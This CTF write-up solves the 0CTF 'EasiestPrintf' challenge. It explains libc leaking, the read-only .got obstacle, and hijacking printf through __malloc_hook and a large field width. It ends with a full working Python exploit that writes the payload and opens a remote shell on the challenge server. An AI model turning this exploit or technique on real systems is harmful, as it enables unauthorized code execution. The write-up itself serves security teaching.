The task, as the name implies, was a rather basic (at first glance - there was a plot twist) format string bug in a short 32-bit Debian application. The initial description of the task was:
---
Warm UP! A traditional Format String Attack.
202.120.7.210 12321
http://dl.0ops.net/EasiestPrintf
---
It was later updated (without me noticing; though in all fairness it didn't change much) to:
---
Warm UP! A traditional Format String Attack.
It's running on Debian 8.
nc 202.120.7.210 12321
http://dl.0ops.net/EasiestPrintf
http://dl.0ops.net/libc.so.6_0ed9bad239c74870ed2db31c735132ce
---
The code itself was rather simple and boiled down to the following steps:
- Turn off buffering for stdin/stdout/stderr and set up an alarm for one minute (a rather usual thing in CTF tasks).
- Manually randomize the stack address by doing a 16-byte aligned alloca().
- Get one decimal number (address) from the user and print in hexadecimal a 32-bit word from that address (an explicit leak).
- Read up to 159 bytes into a buffer on the stack (or up until \n was encountered, whichever came first) and do a printf(buffer) on it.
- Call exit(0) immediately after printf.
The manual ASLR from the second point could actually be ignored (at least I didn't find it annoying in any way), and the explicit leak from the third point had to be used to leak the address of libc (or, to be more accurate, to leak the address of one of the resolved functions from .got and calculate the address of libc based on that).
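As a small illustration of that calculation, here is a sketch that turns a leaked alarm address into a libc base. The two offsets are the ones used in the exploit at the end of the post and are only valid for that specific libc build; the helper name libc_base_from_leak and the example leak value (derived from the libc base printed in the exploit log) are mine.

```python
# Offsets taken from the exploit at the end of the post; they only hold for
# the particular libc build that the challenge server was running.
ALARM_OFFSET = 0xB6C70
SYSTEM_OFFSET = 0x3E3E0


def libc_base_from_leak(leaked_alarm):
    """Return the libc load address given the run-time address of alarm()."""
    base = leaked_alarm - ALARM_OFFSET
    # Shared objects are mapped on page boundaries, so a plausible base has
    # its low 12 bits clear. Anything else hints at a wrong offset or libc.
    if base & 0xFFF:
        raise ValueError("base 0x%x is not page aligned" % base)
    return base


# Illustrative leak: the base printed in the exploit log plus the alarm offset,
# i.e. the value the server would have returned for alarm's .got entry.
leak = 0xF75DE000 + ALARM_OFFSET
base = libc_base_from_leak(leak)
print("libc   @ 0x%x" % base)
print("system @ 0x%x" % (base + SYSTEM_OFFSET))
```

The page-alignment check is a cheap sanity test: if the wrong libc was guessed, the computed base will usually not end in three zero nibbles.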
While a link to the libc was later added to the task description, I didn't notice it until after I had solved the challenge, so I had to use the usual method of leaking 2-3 addresses from .got (in my case these were read, close and alarm) and looking up the libc in our database of libcs (a good thing to have). Exactly one library matched all three addresses (or rather, the lowest 12 bits of all three addresses), which gave me exactly one libc. And exactly zero ld-linux.so.2, which meant I couldn't debug the application locally, but I didn't care that much either (if possible I prefer to solve tasks straight on the challenge server - far fewer problems with differences in the environment).
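The lookup itself is simple enough to sketch. ASLR shifts libc by whole pages, so the lowest 12 bits of every symbol address stay the same as in the file on disk, and those bits can be compared against a table of known builds. Everything in the database below is hypothetical (library names, and the read and close offsets); only the alarm offset 0xB6C70 comes from the exploit in this post.

```python
def page_offset(addr):
    """Low 12 bits of an address; unaffected by page-granular ASLR."""
    return addr & 0xFFF


def matching_libcs(leaks, database):
    """Return names of libcs whose symbol offsets agree with every leak."""
    matches = []
    for name, symbols in sorted(database.items()):
        if all(sym in symbols and
               page_offset(symbols[sym]) == page_offset(addr)
               for sym, addr in leaks.items()):
            matches.append(name)
    return matches


# Hypothetical database: symbol -> offset inside each libc build.
DATABASE = {
    "libc-A": {"read": 0xD5AF0, "close": 0xD6200, "alarm": 0xB6C70},
    "libc-B": {"read": 0xDAB20, "close": 0xDB230, "alarm": 0xB6C70},
    "libc-C": {"read": 0xD5AF0, "close": 0xD6200, "alarm": 0xB5E60},
}

# Hypothetical leaks, as if read from three .got entries of a running process.
BASE = 0xF75DE000
leaks = {
    "read": BASE + 0xD5AF0,
    "close": BASE + 0xD6200,
    "alarm": BASE + 0xB6C70,
}

found = matching_libcs(leaks, DATABASE)
print(found)
```

A single leak often matches several builds (here libc-A and libc-B share the alarm offset), which is why leaking two or three symbols is the usual practice.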
With the libc in hand, all I had to do was create a format string that would overwrite the .got entry of exit with the address of a ROP gadget that pivots the stack to my buffer, launching a ROP chain that runs system("/bin/sh"). Done, right?
Wrong.
It turned out that .got was read-only.
This started a three-hour-long journey to find something to overwrite that would give me control over EIP. The fact that exit() was called immediately after printf() returned didn't make things easier. The things I tried along the way:
- Destructor tables in main binary and libc - nope, read only.
- The atexit list - nope, pointer encrypted, don't know the secret value.
- stdout's function vector table - nope, read only (one thing I didn't try was to change the address of the vector table itself).
- A few function pointers that might be called on exit in libc - nope, read only.
- The return address of printf itself - nope, no idea where the stack is.
Finally I recalled that libc has memory allocation hooks (__malloc_hook, __free_hook, etc.), which are pointers to functions that get called when malloc or free is invoked. Luckily these pointers were not encrypted (given how they are meant to be used - global function pointers that the programmer overwrites directly - they cannot be encrypted).
However, does printf really use malloc?
At first I thought about the $ positional markers - when glibc's printf implementation encounters them, it creates a copy of the arguments from the stack (it needs a lookup table, and the usual vararg access methods don't provide such an option). But it turned out it uses alloca() (i.e. on-stack allocation) to do so (snippet from glibc-2.19/stdio-common/vfprintf.c):
/* Here starts the more complex loop to handle positional parameters. */
do_positional:
  ...
  /* Array with information about the needed arguments. This has to
     be dynamically extensible. */
  size_t nspecs = 0;
  /* A more or less arbitrary start value. */
  size_t nspecs_size = 32 * sizeof (struct printf_spec);
  struct printf_spec *specs = alloca (nspecs_size);
But since I was already looking at printf's internals, I just grepped for "malloc" and "free" finding a couple of places where they are indeed called. The most promising one was related to the width specifier (you know, e.g. "%1234x" - 1234 is the width of the field) of any format field:
if (width >= sizeof (work_buffer) / sizeof (work_buffer[0]) - 32)
  {
    /* We have to use a special buffer. The "32" is just a safe
       bet for all the output which is not counted in the width. */
    size_t needed = ((size_t) width + 32) * sizeof (CHAR_T);
    if (__libc_use_alloca (needed))
      workend = (CHAR_T *) alloca (needed) + width + 32;
    else
      {
        workstart = (CHAR_T *) malloc (needed);
After both doing some experiments (checking when malloc is called and when it's not) and looking up this code in the libc binary, I found out that any width above 65535 - 32 actually causes malloc (and eventually free) to be called, and that both __malloc_hook and __free_hook really are invoked, giving me EIP control.
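To make the relationship between the field width and the allocation explicit, here is a tiny model of the branch quoted above. The threshold is the empirical figure from my experiments on this particular libc build, not something glibc guarantees, and the function names are made up for this sketch.

```python
# Empirical threshold from the experiments described in the text; treat it as
# an observation about one libc binary, not as a documented glibc constant.
MALLOC_THRESHOLD = 65535 - 32
EXTRA = 32         # the "+ 32" from the vfprintf.c snippet
SIZEOF_CHAR_T = 1  # CHAR_T is plain char in the narrow printf family


def triggers_malloc(width):
    """True if a field width is expected to take the malloc() branch."""
    return width > MALLOC_THRESHOLD


def malloc_argument(width):
    """Value of 'needed', i.e. what malloc (and __malloc_hook) receives."""
    return (width + EXTRA) * SIZEOF_CHAR_T


for width in (1234, 65503, 65504, 0x804A04C - 32):
    print("%%%ds -> malloc: %-5s needed: 0x%x"
          % (width, triggers_malloc(width), malloc_argument(width)))
```

The interesting part is the second function: since the attacker chooses the width, the attacker also chooses the first argument of whatever __malloc_hook points to.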
Initially I wanted to overwrite the __free_hook with a gadget that would pivot the stack to my buffer to launch a ROP chain, but it turned out it's rather hard to do that (or at least my experiments failed; might be that it was 4am though).
So in the end I resorted to using a method abusing the fact that __malloc_hook was actually called with the width (+32) as an argument, so I ended up doing the following:
- I put "sh\0\0" in the main binary's .data section.
- Then I overwrote __malloc_hook with the address of system.
- And triggered the whole thing by using a "%WIDTHs" tag, where WIDTH was the address of said "sh\0\0" minus 32.
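The last step of the list above can be sketched as follows. SH_ADDR is the WHERE2 value from the exploit at the end of the post; the helper name trigger_directive is made up, and the upper bound check rests on my assumption that the width is parsed into a signed int, so only addresses below 2^31 (such as the main binary's .data) can be expressed this way.

```python
SH_ADDR = 0x804A04C            # WHERE2 in the exploit: writable .data address
MALLOC_THRESHOLD = 65535 - 32  # empirical figure from the text


def trigger_directive(target_arg):
    """Build a %<width>s directive so that malloc is called with target_arg."""
    width = target_arg - 32    # printf adds the 32 back before calling malloc
    if width <= MALLOC_THRESHOLD:
        raise ValueError("width too small, printf would not call malloc")
    if width > 0x7FFFFFFF:
        # Assumption: the width must fit in a signed 32-bit int.
        raise ValueError("width does not fit in a signed int")
    return "%" + str(width) + "s"


directive = trigger_directive(SH_ADDR)
received = int(directive[1:-1]) + 32  # what the hooked malloc gets as argument
print(directive)
print("malloc argument: 0x%x" % received)
```

With __malloc_hook pointing at system, that argument is interpreted as a char pointer, so the call effectively becomes system("sh").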
A small problem was that the address of the third byte of __malloc_hook contained the \n character, which broke my write-byte-by-byte method (i.e. "%hhn"), but it was enough to switch to a write-a-word method for that specific place (so the upper byte of the word overwrites the problematic byte).
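The newline problem is easy to check mechanically. The sketch below packs each candidate write address the way it would appear in the payload and reports the ones containing "\n". The hook offset is WHERE - LIBC from the exploit, the base is the one printed in the exploit log, and the helper name addresses_with_newline is mine.

```python
import struct

MALLOC_HOOK_OFFSET = 0x1A9408  # WHERE - LIBC in the exploit
LIBC_BASE = 0xF75DE000         # base printed in the exploit log


def addresses_with_newline(addresses):
    """Return the addresses whose little-endian encoding contains '\\n'."""
    return [a for a in addresses if b"\n" in struct.pack("<I", a)]


hook = LIBC_BASE + MALLOC_HOOK_OFFSET

# Naive plan: four %hhn writes, one per byte of the pointer.
per_byte = [hook, hook + 1, hook + 2, hook + 3]
# Plan used in the exploit: %hhn at +0, %hn at +1 (covers +1 and +2), %hhn at +3.
mixed = [hook, hook + 1, hook + 3]

bad_naive = addresses_with_newline(per_byte)
bad_mixed = addresses_with_newline(mixed)
print(["0x%x" % a for a in bad_naive])
print(["0x%x" % a for a in bad_mixed])
```

Because libc is loaded at a page-aligned address, the low byte of hook + 2 is 0x0A on every run, so this was not bad luck with ASLR but a fixed property of this libc build.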
And to my surprise, it worked on the first try (full exploit is at the end of the post):
gynvael:haven-windows> pwnbase.py
libc @ 0xf75de000L
224 196 0xe0L
195 24803 0x61c3L
247 52 0x61f7L
224 124 0x6273
195 245 0x6368
97 152 0x6400
247 256 0x6500
120
Shell opened!
cat /home/EasiestPrintf/flag
flag{Dr4m471c_pr1N7f_45_y0u_Kn0w}
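For the curious, the first three lines of numbers in the log above (padding and running output count for the three writes to __malloc_hook) can be reproduced offline. This sketch reuses the getoffset logic from the exploit with renamed parameters; the libc base is the one printed in the log and the system offset is the one from the exploit.

```python
def getoffset(target, count):
    """Return (padding, new_count) so that new_count % 256 == target % 256.

    'count' is the number of characters printf has emitted so far.
    """
    while count >= target:
        target += 256
    return target - count, target


system = 0xF75DE000 + 0x3E3E0  # libc base from the log + system offset
count = 7 * 4                  # seven 4-byte addresses precede the directives

steps = []
for value in (system & 0xFF,           # %hhn: lowest byte
              (system >> 8) & 0xFFFF,  # %hn: the two middle bytes
              (system >> 24) & 0xFF):  # %hhn: highest byte
    pad, count = getoffset(value, count)
    steps.append((pad, count))
    print("pad %5d -> total 0x%x" % (pad, count))
```

Note that stepping by 256 is only strictly correct for %hhn writes; the single %hn write works here because its target value is already larger than the running count, so the loop body never executes for it.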
And that's it! I really liked this task, especially due to the plot twist with the read-only .got - it forced me to dig a little deeper than usual into printf's internals, which was pretty fun in the end.
P.S. Exploit (Python 2.7):
#!/usr/bin/python
import sys
import socket
import telnetlib
import os
import time
from struct import pack, unpack

# Receive byte by byte until txt shows up in the data (returns False on error).
def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        print "-=(warning)=- recvuntil() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvuntil() failed:", msg
      print "Last received data:"
      print d
      return False
    d += dnow
  return d

# Receive exactly n bytes (returns False on error).
def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        print "-=(warning)=- recvall() failed at recv"
        print "Last received data:"
        print d
        return False
    except socket.error as msg:
      print "-=(warning)=- recvall() failed:", msg
      print "Last received data:"
      print d
      return False
    d += dnow
  return d

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    return recvall(self._sock, n)

  def recvuntil(self, txt):
    return recvuntil(self._sock, txt)

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def go():
  global HOST
  global PORT
  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))

  # Put your code here!
  M1 = "Which address you wanna read:\n"
  s.recvuntil(M1)
  addr = 0x08049FD4  # alarm in .got
  s.sendall("%u\n" % addr)
  LIBC = int(s.recvuntil("\n").strip(), 16)
  LIBC -= 0xB6C70
  print "libc @ ", hex(LIBC)

  SYSTEM = LIBC + 0x3E3E0
  EBFE = LIBC + 0x24119  # Good for debugging.
  PUTS = 0x80485C0

  WHAT = SYSTEM
  WHERE = LIBC + 0x1A9408
  WHERE2 = 0x804A04C  # A writable address in .data.
  WHAT2 = rd("sh\0\0")

  fmt = ""
  fmt += dd(WHERE) + dd(WHERE+1) + dd(WHERE+3)
  fmt += dd(WHERE2) + dd(WHERE2+1) + dd(WHERE2+2) + dd(WHERE2+3)
  cnt = len(fmt)

  def getoffset(b, c):
    while c >= b:
      b += 256
    return b - c, b

  # First write (__malloc_hook with system).
  diff, cnt = getoffset(WHAT & 0xff, cnt)
  print WHAT & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%7$hhn"

  diff, cnt = getoffset((WHAT >> 8) & 0xffff, cnt)
  print (WHAT >> 8) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%8$hn"

  diff, cnt = getoffset((WHAT >> 24) & 0xff, cnt)
  print (WHAT >> 24) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%9$hhn"

  # Second write (.data address with "sh\0\0").
  diff, cnt = getoffset(WHAT2 & 0xff, cnt)
  print WHAT & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%10$hhn"

  diff, cnt = getoffset((WHAT2 >> 8) & 0xff, cnt)
  print (WHAT >> 8) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%11$hhn"

  diff, cnt = getoffset((WHAT2 >> 16) & 0xff, cnt)
  print (WHAT >> 16) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%12$hhn"

  diff, cnt = getoffset((WHAT2 >> 24) & 0xff, cnt)
  print (WHAT >> 24) & 0xff, diff, hex(cnt)
  fmt += "%" + str(diff) + "c" + "%13$hhn"

  # Trigger the malloc, use addr of "sh\0\0" as width.
  fmt += "%" + str(WHERE2 - 32) + "s"

  # Padding to 4. Probably not needed.
  while (len(fmt) % 4) != 0:
    fmt += "|"

  print len(fmt)
  if '\n' in fmt:
    print "OOOOOOOOOPSSSSSS \\n in payload lol"

  s.sendall(fmt + "\n")
  s.sendall("echo -- it worked --\n")
  s.recvuntil("-- it worked --\n")
  print "Shell opened!"

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  s.close()

HOST = '202.120.7.210'
PORT = 12321
go()